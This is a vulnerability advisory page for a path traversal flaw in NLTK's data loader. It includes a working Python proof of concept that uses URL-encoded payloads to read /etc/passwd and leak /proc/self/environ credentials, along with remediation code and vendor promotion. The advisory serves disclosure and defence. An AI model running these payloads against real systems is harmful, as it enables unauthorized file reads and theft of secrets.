CVE-2026-54293

CVE-2026-54293 is a high-severity path traversal vulnerability in nltk (pip), affecting versions <= 3.9.4. No fixed version is listed yet.

Summary

nltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK's SECURITY.md and read arbitrary files from the filesystem.
While literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path.

Affected Component

The affected code is in nltk/data.py: find(), normalize_resource_url(), and the _UNSAFE_NO_PROTOCOL_RE regex check.
Relevant occurrences:

data.py L54–L69: _UNSAFE_NO_PROTOCOL_RE operates only on the undecoded string
data.py L219–L245: normalize_resource_url() for the nltk: scheme contributes to the decode-after-check flaw
data.py L615–L618: the defense-in-depth traversal check also operates on undecoded input
data.py L650–L653: the final path is constructed from url2pathname(resource_name) after the checks

Root Cause
The regex _UNSAFE_NO_PROTOCOL_RE is matched against the raw resource string. Path normalization via url2pathname() happens later, so any percent-encoded / (%2f) or . (%2e) is invisible to the regex but becomes active in the final path.
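
The ordering problem can be reproduced without NLTK. The sketch below is illustrative only: UNSAFE_RE is a hypothetical, simplified filter (not NLTK's actual _UNSAFE_NO_PROTOCOL_RE), and urllib.parse.unquote() stands in for the %xx decoding that url2pathname() performs. The function names check_then_decode() and decode_then_check() are likewise invented for this example.

```python
import re
from urllib.parse import unquote

# Hypothetical, simplified stand-in for a traversal filter. This is NOT
# NLTK's actual _UNSAFE_NO_PROTOCOL_RE; it only rejects a leading "/" and
# literal ".." path segments.
UNSAFE_RE = re.compile(r"^/|(^|/)\.\.(/|$)")


def check_then_decode(resource):
    """Flawed order: validate the raw string, then decode it."""
    if UNSAFE_RE.search(resource):
        raise ValueError(f"unsafe resource: {resource!r}")
    # unquote() stands in for the %xx decoding done by url2pathname().
    return unquote(resource)


def decode_then_check(resource):
    """Safer order: decode first, then validate what will actually be used."""
    decoded = unquote(resource)
    if UNSAFE_RE.search(decoded):
        raise ValueError(f"unsafe resource: {resource!r}")
    return decoded


if __name__ == "__main__":
    payloads = (
        "../../etc/passwd",
        "%2fetc%2fpasswd",
        "corpora/..%2f..%2fetc%2fpasswd",
    )
    for payload in payloads:
        for func in (check_then_decode, decode_then_check):
            try:
                print(f"{func.__name__}({payload!r}) -> {func(payload)!r}")
            except ValueError as exc:
                print(f"{func.__name__}({payload!r}) -> blocked ({exc})")
```

With this toy filter, the literal payload is rejected by both functions, while the encoded payloads pass check_then_decode() and are rejected only when the check runs on the decoded string.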

Proof of Concept

"""
NLTK Arbitrary File Read via URL-Encoded Path Traversal
=======================================================
Bypasses _UNSAFE_NO_PROTOCOL_RE security regex in nltk/data.py
by URL-encoding path separators and traversal components.

Affected: NLTK <= 3.9.4 (default ENFORCE=False configuration)
CWE: CWE-22 (Path Traversal)

Root Cause:
  nltk/data.py:find() checks resource names against a regex for
  traversal patterns (../, leading /, etc.) BEFORE calling
  url2pathname() which decodes %xx sequences. This is a classic
  "decode-after-check" vulnerability.
"""

import sys
import os
import warnings

# Suppress NLTK security warnings for clean PoC output
warnings.filterwarnings("ignore", category=RuntimeWarning)

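# Setup: prefer a local NLTK checkout in ./nltk next to this script (if present),
# and make sure the default NLTK data directory exists
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "nltk"))
os.makedirs(os.path.expanduser("~/nltk_data/corpora"), exist_ok=True)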

import nltk
from nltk.pathsec import ENFORCE

BANNER = """
===================================================
 NLTK URL-Encoded Path Traversal PoC
 Affected: nltk <= 3.9.4
 Default ENFORCE={enforce}
===================================================
""".format(enforce=ENFORCE)

def test_variant(name, payload, fmt="raw"):
    """Test a single traversal variant."""
    try:
        content = nltk.data.load(payload, format=fmt)
        if isinstance(content, bytes):
            preview = content[:200].decode("utf-8", errors="replace")
        else:
            preview = content[:200]
        first_line = preview.split("\n")[0]
        print(f"  [VULN] {name}")
        print(f"         Payload: {payload}")
        print(f"         Read OK: {first_line}")
        return True
    except Exception as e:
        print(f"  [SAFE] {name}")
        print(f"         Payload: {payload}")
        print(f"         Blocked: {type(e).__name__}: {e}")
        return False


def main():
    print(BANNER)
    vulns = 0

    # --- Variant 1: URL-encoded absolute path ---
    print("[1] URL-encoded absolute path (%2f = /)")
    if test_variant(
        "Encoded leading slash bypasses ^/ regex check",
        "nltk:%2fetc%2fpasswd",
    ):
        vulns += 1

    print()

    # --- Variant 2: Encoded dot-dot traversal ---
    print("[2] URL-encoded dot-dot traversal (%2e = .)")
    if test_variant(
        "Encoded dots bypass \\.\\./ regex check",
        "nltk:corpora/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    ):
        vulns += 1

    print()

    # --- Variant 3: Literal dots with encoded slash ---
    print("[3] Literal dots with encoded slash (..%2f)")
    if test_variant(
        "Encoded slash after literal .. bypasses \\.\\./ regex",
        "nltk:corpora/..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    ):
        vulns += 1

    print()

    # --- Variant 4: Read process environment (credential leak) ---
    print("[4] Read /proc/self/environ (credential leakage)")
    try:
        content = nltk.data.load("nltk:%2fproc%2fself%2fenviron", format="raw")
        env_vars = content.decode("utf-8", errors="replace").split("\x00")
        print(f"  [VULN] Leaked {len(env_vars)} environment variables")
        for var in env_vars[:3]:
            if var:
                key = var.split("=")[0] if "=" in var else var
                print(f"         {key}=...")
        vulns += 1
    except Exception as e:
        print(f"  [SAFE] Blocked: {e}")

    print()

    # --- Control: verify normal traversal IS blocked ---
    print("[CONTROL] Verify literal ../ is blocked by regex")
    test_variant("Direct traversal (should be blocked)", "nltk:../../../etc/passwd")

    print()
    print("=" * 51)
    print(f" Result: {vulns} bypass variant(s) succeeded")
    if vulns > 0:
        print(" Status: VULNERABLE (url2pathname decodes after regex check)")
    else:
        print(" Status: Not vulnerable")
    print("=" * 51)


if __name__ == "__main__":
    main()

Impact

Arbitrary local file read whenever attacker-controlled input reaches nltk.data.load(). Realistic targets include:

/etc/passwd, /etc/shadow (if readable)
/proc/self/environ, leaks environment variables, often containing API keys, DB credentials, cloud secrets
Application source code and configuration files
Cloud metadata, deployment secrets, SSH keys

This is directly relevant to web applications, hosted notebook services, multi-tenant ML pipelines, and CI/CD systems that pass untrusted resource identifiers into NLTK. NLTK's SECURITY.md explicitly places path traversal within the scope of its protection model, so this is a documented security boundary being broken.

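In a path traversal attack, input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. The typical impact of this class is unauthorized file read or write outside that directory; for this CVE, the demonstrated impact is arbitrary file read.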

CVE-2026-54293 has a CVSS score of 7.5 (High). The vector is network-reachable and requires no privileges and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

nltk (<= 3.9.4)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Remediation advice

No fixed version is listed for CVE-2026-54293 yet.

In the interim, decode any user-supplied resource identifier before validating it, then resolve the canonical path and verify that it remains within the intended directory before accessing it.
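
One way an application could apply this advice before handing a path to any file API is sketched below. It is a minimal illustration under stated assumptions, not an NLTK patch: resolve_inside() is a hypothetical helper, base_dir is whatever directory the application intends to expose, and urllib.parse.unquote() is used as a stand-in for the percent-decoding step.

```python
import os
from urllib.parse import unquote


def resolve_inside(base_dir, resource):
    """Return the canonical path for `resource` under `base_dir`, or raise.

    Hypothetical helper for illustration; not part of NLTK.
    """
    base = os.path.realpath(base_dir)
    # Decode first so the check sees the same path the filesystem will see.
    decoded = unquote(resource)
    # os.path.join discards `base` when `decoded` is absolute; realpath then
    # collapses ".." segments and follows symlinks.
    candidate = os.path.realpath(os.path.join(base, decoded))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:
        # Raised, for example, when the paths are on different Windows drives.
        inside = False
    if not inside:
        raise PermissionError(f"resource escapes {base!r}: {resource!r}")
    return candidate
```

The containment check compares canonical paths rather than strings, so encoded separators, encoded dots, and symlinks are all evaluated in the form the operating system would actually open. A call such as resolve_inside("/srv/nltk_data", user_input) would then return a path that can be opened directly, instead of passing user_input to the loader unchanged.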

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-54293? CVE-2026-54293 is a high-severity path traversal vulnerability in nltk (pip), affecting versions <= 3.9.4. No fixed version is listed yet. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. How severe is CVE-2026-54293? CVE-2026-54293 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of nltk are affected by CVE-2026-54293? nltk (pip) versions <= 3.9.4 are affected.
  4. Is there a fix for CVE-2026-54293? No fixed version is listed for CVE-2026-54293 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is CVE-2026-54293 exploitable, and should I be worried? Whether CVE-2026-54293 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-54293 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-54293? No fixed version is listed yet. In the interim, decode any user-supplied resource identifier before validating it, then resolve the canonical path and verify that it remains within the intended directory before accessing it.

Other vulnerabilities in nltk

CVE-2026-54293, CVE-2026-33236, CVE-2026-33230, CVE-2026-0846, CVE-2026-0847
